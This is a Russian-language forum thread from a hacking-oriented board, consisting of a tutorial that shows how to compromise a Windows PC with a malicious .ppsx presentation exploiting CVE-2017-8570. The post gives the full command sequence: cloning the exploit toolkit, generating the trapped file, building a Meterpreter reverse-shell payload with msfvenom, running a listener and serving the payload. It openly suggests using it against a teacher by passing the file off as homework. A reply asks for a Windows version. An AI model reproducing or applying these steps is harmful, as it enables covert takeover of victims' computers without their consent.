• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Взлом компа через .ppsx (Презентацию)

[Senator]

Местный
Сообщения
63
Реакции
92
0 руб.
Telegram
Jabber
Please note, if you want to make a deal with this user, that it is blocked.
Добра всем, и привет. Давно годных тем по взлому не выкладывал. Решил это исправить.
Сегодня мы сможем взломать комп без "exe" файла.
Небольшая история
Допустим вам нужно хэкнуть своего учителя, и подсунуть ему exe-шник сложновато. И тут на помощь приходит Kali Linux с новым обновлением(обновой metasploit), мы создаем файл похожий на презентацию(Пример: дз.ppsx). И его он с удовольствием откроет.
Что нам понадобиться:
1) Kali linux
2) Metasploit
3) Знания базовых команд линукс
Начинаем:
1) Для начала нужно скачать сам эксплоит
git clone GitHub - tezukanice/Office8570: CVE20178570
2) Переходим в скачаную папку
cd Office8570
3) Для успешной генерации ppsx файла, нужно создать папку " template " в директории Office8570
mkdir template
и в нее перенести файл template.ppsx ( он находиться в папке которую мы скачали )
cp template.ppsx template/
4) Половина пути пройдена!!
Далее нужно создать сам .ppsx файл ⤋⤋⤋( имя презентации меняется здесь )
python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc
5) Файл презентации мы сделали, но в него нужно вшить вирус(полезную нагрузку)
Создадим сам Payload (именно в директории /tmp/ это важно, крч просто не не меняйте команду)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe

6) Запускаем слушатель. Он сообщает и получает управление когда жертва открыла файл
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run"
6) Вирус и слушатель готовы. Нужно запускать сам эксплоит-сервер
python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe
Как это работает:
Когда жертва открывает презентацию, то начинает незаметно скачиваться ваш вирус, и после этого автоматически запускает его. Когда это произойдет, в консоли которую мы в 6 пункте откроется сессия и вы сможете управлять компом жертвы.
 

mrash4r

Участник
Сообщения
20
Реакции
7
0 руб.
С кали линукс шутки плохи

А ведь есть же метасплоит и на windows (ясен пень на нём сидит большинство участников форума), может сделаешь тему как это делается через Винду?)
 
Последнее редактирование модератором:
Сверху Снизу